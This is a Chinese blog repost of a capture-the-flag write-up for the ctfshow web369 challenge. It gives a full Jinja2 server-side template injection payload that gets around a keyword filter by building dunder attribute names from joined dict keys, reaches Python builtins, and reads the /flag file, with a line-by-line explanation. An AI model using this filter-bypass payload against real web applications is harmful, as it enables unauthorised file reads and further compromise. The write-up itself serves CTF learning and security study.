热门标签
热门文章
- 1基于SpringBoot + MyBatis + WebMagic的爬虫_springboot+mybatis实现爬虫
- 2C/C++不火了?还值得学么?_c++真的被淘汰了不值得学吗
- 3单片机之蓝牙通信_单片机与蓝牙的通信方式是什么
- 4又火两个惊艳的AI项目,已开源!_cradle框架
- 5IDEA 显示Git 工具_idea打开时展示git
- 6Prometheus监控rabbitmq
- 7C语言力扣刷题11——打家劫舍1——[线性动态规划]
- 8探索LLM 在金融领域有哪些潜在应用——通过使用 GPT-4 测试金融工程、市场预测和风险管理等 11 项任务_fiqa-sa
- 9Flutter基础 -- Flutter常用组件_flutter 组件库
- 10Linux下的DevOps
当前位置: article > 正文
ctfshow-web369(SSTI)_ctfshow"+"web369
作者:在线问答5 | 2024-08-05 05:18:01
赞
踩
ctfshow"+"web369
过滤了request,之前的方法都不能用了,直接用终极代码
- ?name=
- {% set po=dict(po=a,p=a)|join%}
- {% set a=(()|select|string|list)|attr(po)(24)%}
- {% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
- {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
- {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
- {% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
- {% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
- {% set chr=x.chr%}
- {% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}
- {%print(x.open(file).read())%}
代码解释是这样的
- 构造po="pop" #利用dict()|join拼接得到
- {% set po=dict(po=a,p=a)|join%}
-
- 等效于a=(()|select|string|list).pop(24),即a等价于下划线_
- {% set a=(()|select|string|list)|attr(po)(24)%}
-
- 构造ini="___init__"
- {% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
-
- 构造glo="__globals__"
- {% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
-
- 构造geti="__getitem__"
- {% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
-
- 构造built="__builtins__"
- {% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
-
- 调用chr()函数
- {% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
- {% set chr=x.chr%}
-
- 构造file='/flag'
- {% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/在线问答5/article/detail/930966
推荐阅读
相关标签
